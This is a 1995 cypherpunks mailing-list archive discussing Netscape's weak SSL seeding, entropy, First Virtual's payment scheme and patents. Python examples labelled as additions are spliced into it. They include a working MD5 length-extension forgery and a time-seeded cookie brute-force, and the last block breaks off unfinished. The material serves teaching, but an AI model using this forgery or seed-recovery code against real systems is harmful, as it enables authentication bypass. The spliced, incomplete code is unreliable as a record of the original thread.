56727 Mayen     |  hold of the chance, don't end up like others the same song
Germany         |  and dance!"                      - Metallica, 'Motorbreath'

         Email: p_conrad@informatik.uni-kl.de,conrad@unix-ag.uni-kl.de

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMGBpBbFFskV8RCVHAQGyEwQA2QD4FdrHzKAiiiA/MneC66SU8SBo5neS
3kErDNJZQ1vK5qSR7XuSQSJY/svW3F6YozmgG7YD8RcYwoY8O3OjSaEaOmrRqpIi
qftdceLmf5o9O1NktXBLEPTw/qm4IOVwTD4l2P+zsbwvuZpHYt8hBg3bLZm2Xtvy
1OzPp95OzTE=
=HqWo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 22:32:16 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <199509210531.WAA09687@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:01 PM 9/20/95 -0400, Perry E. Metzger wrote:

>PC timers inherently run at Mhz speed -- they interrupt every 100th of
>a second but you can get finer resolution by querying the clock
>chip. Does Windows let you do this?

Yes:  1.196 MHz precision.

The VTD maintains a 64-bit value that is accurate to 0.8 microseconds. This
value is obtained by calling the VTD with AX set to 0100h. The 64-bit value
is returned in EDX:EAX. The returned value indicates the time Windows has
been running based on a 1.196 MHz clock.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 20 Sep 95 20:46:59 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
In-Reply-To: <v02120d1aac85dff6bc68@[199.0.65.105]>
Message-ID: <0kMA2EqMc50eMEb4Yx@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Laurent -- I strongly recommend that you make an effort to understand
the real risks involved in Internet commerce.  There are critical
security flaws in the encrypted commerce approach, which I fear you are
overlooking.  By focusing on the ease of stealing a single identifier,
or faking a single transaction, I think you overlook some much more
important issues.

The point is not that people can't intercept your First Virtual ID by
sniffing on the net.  Obviously they can.

The point is not that people can't forge mail from you.  Obviously they can.

The point is not that people can't intercept FV's confirmation query,
which contains a one-time code, and forge the appropriate response to
authorize that purchase.  Obviously they can.

The point is not that people can't selectively block your incoming mail,
so that you can't even tell when the above has happened.  Obviously they
can.

The point is that if someone goes to all the trouble of doing all the
above -- which is what it takes to commit serious fraud with First
Virtual -- then *all* that they get is the temporary use, on the
Internet only, of a single credit card.  (Note also that I've just
spelled out *exactly* what it takes to commit fraud with FV.  I am
suspicious of any commerce systems that don't offer such an explanation.
In the case of SSL, the explanation would probably start out, "find a
single bug in the implementation of the cryptographic algorithms.")

Schemes like SSL, which encrypt a credit card number and then transmit
it on the net, carry with them a very different kind of risk:  the risk
that a single criminal could steal MILLIONS of credit card numbers.   
If an SSL-like scheme were in wide use world-wide, the hacker who just
made a name for himself by breaking SSL could instead have gone down in
HISTORY as the person who destroyed the twentieth-century credit card
system by stealing millions of credit cards and using each one just
once.  Or, if his goals were more practical, he could have simply chosen
any desired level of affluence and lived that way for the rest of his
life.   (This is not an exaggeration.  I can flesh this out to an
alarming degree of detail, actually.)

FV does not claim to have invented a method of commerce that is
foolproof.  There is no such system, and that certainly includes the
existing credit card, cash, and check infrastructure.  What FV has
invented is a system for Internet commerce in which the risk/reward
ratio is sufficiently low to permit large-scale commerce.  Any
cryptographic approaches which make similar claims must also be
evaluated in terms of risk/reward ratio.  If a system has a catastrophic
risk, no matter how low-probability, this is worse than a system with
higher-probability risks of much lower consequence.  (When driving my
car, I'd rather be in ten fender-benders than one high-speed head-on
collision at 90 MPH.)

My own experience with real-world software -- which is only confirmed by
the recent SSL scandal -- makes me tend to believe that every program
has bugs, and that therefore every crypto system will carry with it a
significant practical risk of compromise.  It therefore makes no sense
to design the commerce infrastructure in such a way that the cost of
that risk is catastrophic.  FV has had several minor incidents of fraud.
They didn't make any headlines and they didn't require any mad scramble
to fix the software, because the costs of the fraud were so low to all
concerned.   -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herbs@interlog.com (Herb Sutter)
Date: Wed, 20 Sep 95 20:46:26 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
Message-ID: <199509210134.VAA09069@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 18:18 1995.09.20 -0400, Ian Goldberg wrote:
>In article <199509201004.DAA23933@ammodump.mcom.com>,
>Jeff Weinstein  <jsw@netscape.com> wrote:
>>
>>  I'd just like to let all cypherpunks know that I'm really interested in
>>getting any feedback you might have about security problems with Netscape
>>products.  I'm particularly interested in bugs in our implementation
>>of SSL, and problems in the protocol that are not addressed in SSL 3.0.
>
>Well, if you'd release Netscape source, we could check its
>implementation... :-)
>
>   - Ian

Mmm... sounds like they want some free consulting. :-)

(BTW, Ian, you're at UofW?  I thought your original 'discovery' email of
three days ago had a berkeley.edu address on it... anyway, if you are a
UofW'er, hello from a fellow Waterloo math/cs grad!)

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 23:27:45 PDT
To: cypherpunks@toad.com
Subject: Re: (none)
Message-ID: <199509210627.XAA14935@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:05 AM 9/21/95 GMT, Phil Karlton wrote:
>James A. Donald <jamesd@echeque.com> writes:
>    Whenever you need a random number, take a one way checksum, 
>    for example MD5, of the most recently altered part of that 
>    buffer.  Use that as your random number. 
>
> How is this any better than feeding the data into the MD5
> hash as I go? This is not a rhetorical question.

Assuming that MD5 loses no entropy, it is identical, or very similar in
strength, since in the algorithm that I described the most recently altered
part of the buffer depends sensitively on all previous noise accumulated
into the buffer, so if the total cumulated entropy is larger than your block
size, you are OK.

However the algorithm I described simply used less computation, but the
overhead of continually doing MD5 is probably modest. 

No matter what you do, if you cumulate a hundred bits of entropy, and if you
use a one way hash to generate random numbers so that your session keys do
not leak information about your entropy, you are going to be safe against a
random number generator attack.

I suggested accumulating a very large amount of entropy, but obviously this
is just gilding the lily.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 23:39:58 PDT
To: David Van Wie <cypherpunks@toad.com>
Subject: Re: Entropy vs Random Bits
Message-ID: <199509210639.XAA15833@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 9/20/95 P, David Van Wie wrote:
> This is odd.  The term entropy describes an aspect of thermodynamic 
> equilibrium in physical systems.  Although sometimes used as a synonym for 
>"random," that definition is vernacular, not technical.  In fact, there is 
> no meaningful relationship between "entropy" and random data of the type 
> described in the postings related to seed values.  In the presence of a 
> perfectly suitable and precise mathematical term (i.e. random),

Your use of the word random is incorrect:  The throw of a dice is 
random, but only contains 2.6 bits of entropy.

The windows VTD counter is very far from being random, but 
contains roughly sixteen bits of entropy.

> why invent new terms?  Why use them to mean at least two different things?

This is an old term of the art, a term of information theory:  We use 
the same word because entropy in information theory has the same 
measure as entropy in thermodynamics.

In both cases the entropy, measured in bits, of an ensemble of 
possible states is the sum of  - P(i) * lg[P(i)] over all the possible states.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com
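
The seeding approach debated in the "random" number seeds thread and the entropy measure quoted in the message above, as an added Python example that is not code from any poster or from Netscape. SHA-256 stands in for MD5; the names, the credits (20 bits for the startup clock, 3 bits per idle event) and every sample input are assumptions constructed for illustration, while the 100-bit threshold follows the "hundred bits of entropy" figure in the thread.

```python
import hashlib
import math
import struct

# Constructed sample inputs (not captured from any real system).
SAMPLE_PS = b"  PID TT  TIME COMMAND\n  101 p0  0:01 sh\n  245 p0  0:07 netscape\n"
SAMPLE_ENV = b"HOME=/home/alice\x00DISPLAY=:0\x00"
SAMPLE_EVENTS = [(i * 7 % 1024, i * 13 % 768, i * 104729 % 1000000)
                 for i in range(40)]  # (mouse x, mouse y, microseconds)


def shannon_bits(probabilities):
    """Entropy in bits of an ensemble of states: sum of -P(i) * lg P(i)."""
    if not math.isclose(sum(probabilities), 1.0, rel_tol=1e-9):
        raise ValueError("probabilities must sum to 1")
    return -sum(p * math.log2(p) for p in probabilities if p > 0)


class SeedPool:
    """Feeds inputs into one running hash and keeps a ledger of credited bits."""

    def __init__(self, required_bits=100.0):
        self._hash = hashlib.sha256()  # assumption: SHA-256 in place of MD5
        self._required = required_bits
        self._credited = 0.0
        self._outputs = 0

    def feed(self, label, data, unguessable_bits=0.0):
        """Mix data in; credit only what an observer could not guess."""
        for field in (label.encode("ascii"), data):
            # Length prefixes keep ("ab", "c") distinct from ("a", "bc").
            self._hash.update(struct.pack(">I", len(field)))
            self._hash.update(field)
        # Known bits are still mixed in, but a source is never credited
        # with more bits than it physically contains.
        self._credited += max(0.0, min(unguessable_bits, 8.0 * len(data)))

    @property
    def credited_bits(self):
        return self._credited

    def ready(self):
        return self._credited >= self._required

    def output(self, nbytes=16):
        """Derive bytes through the one-way hash instead of exposing the state."""
        if not self.ready():
            raise RuntimeError("only %.1f of %.1f bits credited"
                               % (self._credited, self._required))
        if not 0 < nbytes <= self._hash.digest_size:
            raise ValueError("nbytes out of range")
        self._outputs += 1
        fork = self._hash.copy()  # the running state itself is never finalised
        fork.update(struct.pack(">IQ", 0xFFFFFFFF, self._outputs))
        return fork.digest()[:nbytes]


def startup_pool(clock_ticks, required_bits=100.0):
    """Program start: fast clock first, then data any local user can also see."""
    pool = SeedPool(required_bits)
    pool.feed("clock", struct.pack(">Q", clock_ticks), 20.0)  # assumed credit
    pool.feed("ps", SAMPLE_PS, 0.0)    # visible to other users: no credit
    pool.feed("env", SAMPLE_ENV, 0.0)  # treated as known: no credit
    return pool


def feed_idle_events(pool, events, bits_per_event=3.0):
    """Reseed on each idle event until the ledger is full; return events used."""
    used = 0
    for x, y, usec in events:
        if pool.ready():
            break
        pool.feed("idle", struct.pack(">HHI", x, y, usec), bits_per_event)
        used += 1
    return used


if __name__ == "__main__":
    print("one die throw: %.3f bits" % shannon_bits([1 / 6] * 6))
    pool = startup_pool(clock_ticks=123456789)
    print("credited at start:", pool.credited_bits)
    print("idle events needed:", feed_idle_events(pool, SAMPLE_EVENTS))
    print("seed bytes:", pool.output().hex())
```

Two pools fed the same inputs return the same bytes, which is why the ledger credits only input an attacker cannot reconstruct and refuses output until enough of it has arrived.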





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Sep 95 22:52:27 PDT
To: cypherpunks, gnu
Subject: Netscape is doing well -- give 'em a break.
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <9509210552.AA07852@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> > around at the time that this code was being written.  I must admit that
> > the RNG seed code was not an area that I thought to examine when I took
> > over our security library.
> 
> 	I don't know what your background is, so don't take this as a
> personal attack please, but someone who is trained in computer
> security and cryptography implementation should *know* to check these
> things. Hell, even I would check those things, and I'm not a
> cryptographer by any means.

Hey folks, lighten up!  

Netscape is to be commended for even *putting* crypto into their
product!  Of course the first version is going to have a few screwups;
they're in a fast market and things must be done in a hurry.  But they
are showing a real commitment to securing Internet privacy and
commerce -- with real algorithms and without key escrow.  They hired a
real cryptographer, and their security programmer is a cypherpunk.
They've told the world they will put the real "domestic" version out
for public use.  This is a step that a very small number of companies
even bother with; most don't even have a high-security unexportable
version.  They're combing the net for better random number algorithms.
We could do a lot worse!

Cygnus' Kerberos faced the same random-seed problems and punted in
similar ways.  Our random numbers are derived from the time and the
PID and etc.  You can read the sources to see.  Ted Ts'O claims it is
harder to exploit them because they're mixed in (with DES encryption)
with a secret key, either the Kerberos database's master key on the
server, or the session key from the ticket on the client.  But I
haven't done a full blown security analysis of this scheme.  I was too
busy trying to productize it on eight platforms, write real
documentation, do customer support, and make it run on the *^*&%&&#
Macintosh.  I did have it marked in my mind as something to look at
"when I had the time".  If you-all have the time, hey, go for it!
Might as well look at the one in MIT K5, since that's the development
tree from which all future Kerberoses will come.

All progress is by steps.  Let's step on each others' shoulders, not
on each others' toes.  Netscape is doing us a favor by pushing strong
crypto.  We are doing them a favor by pointing out problems before
they cause major losses to Netscape customers.  The result is higher
security for everyone, and more respect for each other's efforts.  So
kindly show them a little...

	John Gilmore






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sal@panix.com (Sal Denaro)
Date: Wed, 20 Sep 95 21:37:29 PDT
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: AOL monitoring
In-Reply-To: <Pine.SUN.3.91.950919154430.8469E-100000@hertz.isr.umd.edu>
Message-ID: <XrNYwAgbBE6A084yn@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


> > 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600
> Hmmm...potential new crypto product...a "secure" newsreader with encrypted
> .newsrc? 

Why not write a shell script to decrypt your .newsrc, run your
reader then re-encrypt the .newsrc file ?

Why not do that for your mail address book file as well ?

Hey, this is cypher-punks- DIY :)

--
Salvatore Denaro		
sal@panix.com             I waited for the joke/It never did arrive.
Yes, I use PGP         Words I thought I'd choke/I hardly recognize.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 14:28:37 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
In-Reply-To: <v02120d1aac85dff6bc68@[199.0.65.105]>
Message-ID: <9509202127.AA07988@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga writes:
 > --- begin forwarded text
[...]
 > Date: Wed, 20 Sep 1995 10:47:24 -0400 (EDT)
 > From: Nathaniel Borenstein <nsb@nsb.fv.com>
 > To: www-buyinfo@allegra.att.com
 > Subject: Re: Security Flaw Is Discovered In Software Used in Shopping
 > 
[...]
 > For information on a safe, non-cryptographic alternative that has been
 > fully operational for nearly a year, with over 30,000 paying customers,
 > a growth rate featuring a six week doubling period, and NO break-ins to
 > date, check out http://www.fv.com.  -- Nathaniel
After some research on the above advertised site : 
"
   If you can talk to FIRST VIRTUAL via electronic mail, and nobody
   else can read or reply to your E-mail, then your E-mail account is
   compatible with FIRST VIRTUAL.
"
Wonderful, this makes about ***nobody***
Are those folks stupid enough to think that using clear text mail is
something reasonable !!! better use even netscape 1.1 export !
(basically their 'trick' is that you send your CC# by phone, they then
give you an "id" by clear text EMAIL that allows you to shop (you and
all the folks that can intercept your mails) shopping are confirmed by
sending you a clear (!) mail, that you need to answer with "YES" "NO"
or "FRAUD" (!!) very funny system.... I imagine the poor fooled
customer bills...  Probably a lawyer devised te above statement so if
ppl get charged with thing they didn't asked for, fir$t virtual will
answer they were at fault because "someone" can read their mail (even if
the someone is the hacker around FV's mail exchanger...)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Legion of Doom Kennedy Qaddafi security break North Korea DST




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Wed, 20 Sep 95 23:52:44 PDT
To: cypherpunks@toad.com
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <199509210637.XAA11478@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


> But don't they have to put something on the patent application?  Can they
> claim trade secret status for something that was on a patent application,
> but rejected?  That seems like they're getting it both ways. 

At this point, in this country, a patent is secret until it is issued.
It is interesting to note that the process of issuing a patent can
take an indefinite period, and to some extent it is in the control of
the person seeking the patent.  The typical slimy thing to do is
to file for a patent, and keep it a trade secret too.   Delay the
issuance until somebody discovers your secret, then allow the patent
to be issued.  This is called a "submarine" patent.  It allows
the best of both worlds, and extends the patent as far into the
future as possible (17 years from issue date, in this country,
regardless of filing date).

You can delay the patent's issuance by continuing to file amendments
to it.  Gilbert Hyatt's recent patent on microprocessors is the
classic example.

Now, this is all expected to change, to become more harmonious
with the rest of the world.  The changes that I've heard are
1) Go to first-to-file instead of first-to-invent
2) Life is 20 years from filing date, instead of 17 years from issue date
3) Publicize patents some fixed time from filing date, say 1 year

As you can imagine there are armies of lawyers on both sides of the
issue, so I don't think that you'll see any changes in the law any
time soon, but you never know.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Sep 95 23:44:38 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response (source code review)
In-Reply-To: <199509202028.NAA06925@comsec.com>
Message-ID: <9509210644.AA09480@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> > "Netscape has also begun to engage an external group of world-class
> > security experts who will review our solution to this problem before
> > it is sent to customers."
> > 	A group which offered to review the first version, but
> > Netscape refused.
>   Do you mean that cypherpunks offered to review the netscape code
> if only we made all the source available on the net?

I think "the group" was RSADSI, based on a remark of Jim Bidzos.
However, I do think that, like the S1 cipher, your code would get
examined for interesting features and flaws by the cypherpunks if you
released it.

>   We will be having at least some of our code reviewed by a
> wider audience, but I don't yet know which code, or how wide a review
> group.  If anyone has specific suggestions for pieces of code that
> you would like to see widely reviewed (such as RNG and seed generation)
> let me know.

It is becoming gradually clearer in cryptanalysis that you can't test
security of pieces in isolation.  Their interaction with the
surrounding code and protocols is key to their security.  Ross
Anderson's paper at Crypto last month was all about this (``Robustness
Principles for Public Key Protocols'').  There were also several
papers there that showed how you couldn't just treat hash functions
like MD5 as black boxes, since embedding them naively into signature
protocols made it possible to do things like turn a signed short
message into a signed longer (modified!) message.

So far the c'punks haven't done anything clever to your protocols;
they've exploited basic weaknesses in key length and key generation.
There's still a lot of potential in active attacks, three-cornered
attacks, replays, etc, that is unexplored.

>   I realize that some cypherpunks think that we should make all of
> our code publicly available.  In an ideal world that would be great,
> but we live in a world with politicians, crooks, lawyers, stockholders,
> etc...  Don't expect to see us posting our entire security
> library source code to cypherpunks.

Naah.  I think NCSA should've made Mosaic publicly available, because
they wrote it with our tax dollars.  And I hold it against them that
they started the trend of "zero-cost personal-use binaries but no
commercial use" that many Net users still confuse with Real Free
Software (free as in freedom).  But Netscape owns its code, it can do
whatever it wants with it.

I'd still encourage you to err on the side of release.

The strongest tendency in the security industry is for "security by
obscurity", i.e. if we just keep this quiet, nobody will figure it
out.  Customers, even less sophisticated than vendors, often let the
vendors get away with it.  But it doesn't stop the crooks, and
stopping the crooks is what your customers are paying you to do.  

Code that gets public scrutiny, like published scientific papers, gets
debunked and honed and made to really work.  Much faster than code and
ideas that only circulate in small, closed groups.  The reason
Kerberos V5 is a lot more secure than V4 is because its security
features and flaws could be publicly discussed.  Steve Bellovin wrote
a whole paper about what was wrong in V4, and lots of people got to
chew on that and think about how to fix it.

The question that only Netscape management can estimate is: what
damage would it risk to your business, if you released *this much*
crypto code instead of *that much*.  Particularly if you copyright it
and prevent commercial re-use without licensing, I doubt it will help
your competitors much.  There is the risk of revealing a flaw that makes
it easy to crack.  That has to be balanced against the risk of having
such a flaw and not noticing it for years.

And finally, I thought a marketing goal was to make your security
scheme (SSL) a standard throughout the industry?  In that case,
publishing it *and allowing* commercial use would encourage people to
adopt it -- which is what I think you want.

[We all realize that "publishing" crypto code is unconstitutionally
regulated by the State Department.  So there are logistics to the
release process.  But you are presumably solving them for the 128-bit
domestic version; you can use the same procedures to let people
download whatever crypto source code you release.]

	John Gilmore
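
Added example (not from this message or the cited papers): one well-known instance of the problem described above is a tag computed as MD5(key || message), where anyone holding one valid tag can produce the tag of a longer message, while HMAC resists the same step. The key, messages and function names are constructed for illustration; the message does not say which constructions the Crypto papers examined.

```python
import hashlib
import hmac
import math
import struct

# MD5 written out so the internal state can be resumed (hashlib does not allow that).
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_MASK = 0xFFFFFFFF


def md_padding(total_len):
    """MD5 padding for a total_len-byte message: 0x80, zeros, 64-bit bit count."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack("<Q", total_len * 8)


def _compress(state, block):
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & _MASK
        a, d, c = d, c, b
        b = (b + ((f << _S[i]) | (f >> (32 - _S[i])))) & _MASK
    return tuple((x + y) & _MASK for x, y in zip(state, (a, b, c, d)))


def md5(data, state=_IV, prior_len=0):
    """MD5 of data, optionally resuming from a state that already absorbed prior_len bytes."""
    data += md_padding(prior_len + len(data))
    for off in range(0, len(data), 64):
        state = _compress(state, data[off:off + 64])
    return struct.pack("<4I", *state)


KEY = b"constructed-demo-key"       # constructed secret, known only to the verifier
MESSAGE = b"order=42&total=10.00"   # constructed message that was legitimately tagged
SUFFIX = b"&total=0.01"             # constructed bytes appended without the key


def naive_tag(key, message):
    """The naive embedding: hash treated as a black box over key || message."""
    return md5(key + message)


def hmac_tag(key, message):
    """The hardened form: HMAC wraps the inner digest in a second keyed hash."""
    return hmac.new(key, message, hashlib.md5).digest()


def extend(tag, key_len, message, suffix):
    """Using only a tag and the key length, derive (longer message, tag for it)."""
    glue = md_padding(key_len + len(message))   # padding the original hash absorbed
    state = struct.unpack("<4I", tag)           # the digest is the full internal state
    absorbed = key_len + len(message) + len(glue)
    return message + glue + suffix, md5(suffix, state, absorbed)


def demo():
    """Return (naive verifier accepts extension, HMAC verifier accepts extension)."""
    longer, forged = extend(naive_tag(KEY, MESSAGE), len(KEY), MESSAGE, SUFFIX)
    naive_ok = hmac.compare_digest(naive_tag(KEY, longer), forged)
    longer2, forged2 = extend(hmac_tag(KEY, MESSAGE), len(KEY), MESSAGE, SUFFIX)
    hmac_ok = hmac.compare_digest(hmac_tag(KEY, longer2), forged2)
    return naive_ok, hmac_ok


if __name__ == "__main__":
    print("naive accepts extended message: %s, HMAC accepts: %s" % demo())
```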





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 20:49:58 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: /dev/random for Linux
In-Reply-To: <199509210319.UAA04352@goblin.punk.net>
Message-ID: <199509210349.XAA06110@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Simmons writes:
> > On this same track, I suggest that "/dev/random" devices for unix are
> > an excellent idea. Ted Tso did one for Linux that steals all the bits
> > of semi-random timing information it can.
>
> Anyone know where I can find more information on this wonderful device?

I'd ask him. tytso@mit.edu. I've cc'ed him on the mail.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 20 Sep 95 22:55:00 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Entropy vs Random Bits
Message-ID: <3060FDCD@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



I've been watching the debate and discussion unfold on usable sources of 
random data from environments, user actions, etc.  I have a vocabulary 
question (and something of a bone to pick as a mathematician and physicist). 


Usually, the term "entropy" is being used to characterize one of two 
different things: (i) random data, as in "300 bits of entropy," and (ii) the 
"randomness" of data (i.e. high degree of variance in a statistic drawn from 
it), as in "you can find a lot of entropy in the low order bits of a timed 
interval between keystrokes."  I suspect that there are other shades of 
meaning intended in other uses as well.

This is odd.  The term entropy describes an aspect of thermodynamic 
equilibrium in physical systems.  Although sometimes used as a synonym for 
"random," that definition is vernacular, not technical.  In fact, there is 
no meaningful relationship between "entropy" and random data of the type 
described in the postings related to seed values.  In the presence of a 
perfectly suitable and precise mathematical term (i.e. random), why invent 
new terms?  Why use them to mean at least two different things?

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 20 Sep 95 23:23:30 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Patents and trade secrets
Message-ID: <3061045B@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



> > Many technologies have both patented parts and trade secret parts.  Often,
> > companies will maintain information that is in patent applications as trade
> > secret until they are granted.  I guess I should say _if_ they are granted!
>
> But don't they have to put something on the patent application?  Can they
> claim trade secret status for something that was on a patent application,
> but rejected?  That seems like they're getting it both ways.  They should
> probably have to choose whether or not they want to show anyone their
> "secret".  If not, it stays a trade secret.  If so, it's not a secret anymore,
> and they hope it's "nonobvious, etc." enough to be granted a patent.

Sure, they have to put their "best mode" of performing their invention into 
the patent application.  While the patent is pending (at least in the US), 
the patent application is confidential, so if the patent is denied, or if 
the patent is not as broad as the inventor would have liked, they can 
withdraw the application without the information contained in it ever 
becoming public.  In Europe, publication occurs automatically after 18 
months, so the inventor has less time there to make a go/no go decision, but 
they can still do it.

In some respects, the existing system gives you most of what you want -- if 
you can't get patent protection for an idea, you can fall back on trade 
secret protection (which you didn't have to give up just to try to get a 
patent).  It seems pretty harsh to me that just making a stab at getting a 
patent would mean that all of your hard work could just slip away into the 
public domain if it wasn't quite up to snuff.  Sure would make me swallow 
hard....

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@santafe.edu (Nelson Minar)
Date: Wed, 20 Sep 95 23:32:31 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape is doing well -- give 'em a break.
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <9509210631.AA18308@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Netscape is to be commended for even *putting* crypto into their product!

I'm impressed with the way Netscape has responded to recent
events. It's refreshing to see a company say "yes, we made a mistake
in our security software" rather than pretend there's no problem.
Word Perfect encryption, anyone?

>Cygnus' Kerberos faced the same random-seed problems and punted in
>similar ways.

Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
the same problem: the random seed was based on the current time to the
microsecond, modulo the granularity of the system clock. I think I
figured that on my hardware, if I could figure out which minute the X
server started (easy with finger), I'd only have to try a few
thousand keys or so. Caveat: I never actually proved the idea.
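
Added example, not from this message and not X11R4's code: the arithmetic behind "a few thousand keys", showing how a 128-bit cookie derived from a coarse clock reading carries only the clock's uncertainty, next to a cookie drawn from the OS generator. Python's random.Random stands in for the server's generator, and the start time and the 10 ms clock granularity are constructed assumptions.

```python
import math
import random
import secrets

MINUTE_START_S = 811_666_800                              # constructed: start of the known minute
SERVER_START_US = MINUTE_START_S * 1_000_000 + 37_420_000  # constructed: actual start, in microseconds
GRANULARITY_US = 10_000                                   # assumed 100 Hz system clock


def tick_seeds(window_start_s, window_len_s, granularity_us):
    """Every microsecond value a clock of this granularity can report inside the window."""
    start = window_start_s * 1_000_000
    end = (window_start_s + window_len_s) * 1_000_000
    first = -(-start // granularity_us) * granularity_us  # round up to the next tick
    return range(first, end, granularity_us)


def cookie_from_seed(seed):
    """Stand-in for a time-seeded generator: the cookie is a pure function of the seed."""
    return random.Random(seed).getrandbits(128).to_bytes(16, "big")


def effective_bits(candidates):
    """Bits of uncertainty left once the window is known: lg(number of possible seeds)."""
    return math.log2(len(candidates))


def find_seed(cookie, candidates):
    """Re-derive the cookie from each possible clock reading; return the matching seed."""
    for seed in candidates:
        if cookie_from_seed(seed) == cookie:
            return seed
    return None


def strong_cookie():
    """The fix: take all 128 bits from the operating system's generator."""
    return secrets.token_bytes(16)


if __name__ == "__main__":
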